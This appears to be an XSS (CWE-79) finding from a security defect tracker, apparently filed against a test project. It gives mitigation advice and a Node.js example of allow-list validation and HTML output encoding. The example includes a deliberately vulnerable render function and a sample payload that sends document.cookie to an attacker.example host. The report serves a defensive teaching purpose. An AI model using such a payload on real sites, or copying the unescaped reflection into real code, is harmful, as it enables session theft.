reginato / new_project_test
test
ID: REG_00003.002
Category: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Reported by: Rodrigo Reginato
Project: reginato/new_project_test
Severity:
Impact: High
Likelihood: High
Severity: Critical
Standards: OWASP Top 10 [2013] A3 – Cross-Site Scripting (XSS), CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Description: A Cross-Site Scripting (XSS) vulnerability allows an attacker to obtain sensitive information from the web application and can lead to unauthorized access. Exploitation consists of injecting malicious script into the application's pages so that a legitimate user's browser executes it in the application's origin; the script then sends sensitive data, such as session cookies, back to the attacker.
Impact description: Pending
Solution: The first step in mitigating XSS is to identify every point in the application where user-supplied data is used to build response pages. This inventory must cover not only the points where data from a request is copied directly into the response (reflected XSS), but also every point where user-supplied data is persisted by the application and displayed later (stored XSS), as happens, for example, with the data submitted through a registration form.
Validation of incoming data should be based on the context of the information being received: numeric fields should accept strictly numeric characters and reject anything outside the character set the application expects. The same approach should be applied to the other form fields according to the type of information they accept (names, e-mail addresses, phone numbers, and so on). This can be implemented with regular expressions that define the character set allowed for each context (an allow-list) and reject everything else. Input validation reduces the attack surface but does not replace output encoding: data that legitimately contains characters such as apostrophes or angle brackets still has to be encoded when the page is built.
On the output side, when the data is actually used to build responses, potentially dangerous characters must be replaced by the escape sequences defined in HTML. At a minimum, the following literal characters should be replaced by HTML entities:
char " replaced by &quot;
char ' replaced by &#x27;
char & replaced by &amp;
char < replaced by &lt;
char > replaced by &gt;
To go further when building these filters, it is strongly recommended to HTML-encode every character outside the alphanumeric set, whitespace included. Note that these entities are the correct encoding for the HTML body context only; data inserted into attribute values, JavaScript, CSS or URLs requires the encoding specific to that context, as described in the OWASP prevention cheat sheet referenced below.
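As an added example (not code from the reginato/new_project_test project or from this report), the following Node.js script implements the two controls described above: context-based input validation with allow-list regular expressions, and HTML output encoding using the entity table, both in its minimal form and in the stricter "encode everything that is not alphanumeric" form. It applies them to a deliberately vulnerable page that reflects a query parameter. The field names, the patterns, the search page, the payload and the attacker.example host are assumptions for illustration.

```javascript
// Added example, not code from the reginato/new_project_test project: the two
// defences the solution above describes, in plain Node.js with no dependencies.
// Field names, allow-list patterns and the search page are illustrative assumptions.

// ---- 1. Context-based input validation with allow-list regular expressions ----
const FIELD_RULES = {
  age:   /^[0-9]{1,3}$/,                               // strictly numeric
  name:  /^[\p{L} '.-]{1,80}$/u,                      // letters, space, ' . -
  email: /^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$/,
  phone: /^\+?[0-9 ()-]{6,20}$/,
};

// Returns true only when the value matches the allow-list for that field kind.
function validateField(kind, value) {
  const rule = FIELD_RULES[kind];
  if (!rule) throw new Error(`unknown field kind: ${kind}`);
  return typeof value === 'string' && rule.test(value);
}

// ---- 2. Output encoding for the HTML body context ----
// The minimal entity set from the table above. A numeric reference is used for
// the apostrophe because &apos; is not defined in HTML 4.
const HTML_ENTITIES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#x27;',
};

// One regex pass over the string: a chain of separate replace() calls can
// re-encode the '&' of an entity it just produced if '&' is not handled first.
function escapeHtml(str) {
  return String(str).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Stricter variant recommended above: encode every character that is not an
// ASCII letter or digit, whitespace included, as a hex character reference.
// The 'u' flag makes the callback see whole code points, not surrogate halves.
function escapeHtmlStrict(str) {
  return String(str).replace(/[^A-Za-z0-9]/gu,
    (ch) => `&#x${ch.codePointAt(0).toString(16)};`);
}

// ---- 3. The same reflected page, before and after ----
// Vulnerable: the query parameter is copied straight into the response.
function renderSearchVulnerable(query) {
  return `<p>Results for: ${query}</p>`;
}

// Hardened: the value is encoded at the point where the page is built. The same
// call protects stored data read back from a database before display.
function renderSearchHardened(query) {
  return `<p>Results for: ${escapeHtml(query)}</p>`;
}

// Constructed payload of the kind the description refers to: a script that
// sends the victim's cookies to a host the attacker controls (attacker.example
// is a reserved example name that does not resolve).
const PAYLOAD =
  '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>';

// Check used below: does the rendered page still contain an executable script tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

console.log('vulnerable:', renderSearchVulnerable(PAYLOAD));
console.log('hardened:  ', renderSearchHardened(PAYLOAD));
```

Running the script prints the reflected page twice: the vulnerable version carries the script tag unchanged, while the hardened version contains only `&lt;script&gt;...`, which the browser renders as text. The validation step would already have rejected the payload for a numeric or name field, but a free-text field such as a search box has to accept angle brackets, which is why the encoding step is the control that actually stops the injection.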
Reference: https://www.owasp.org/index.php/XSS
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)Prevention_Cheat_Sheet
https://www.owasp.org/index.php/Testing_for_Cross_site_scripting
http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting
http://www.youtube.com/watch?v=Z9RQSnf8-g
Flaw type:
**Code:** test
**Data input:** test
**Data output:** test
Defect Tracker: https://app.conviso.com.br/scopes/191/projects/2181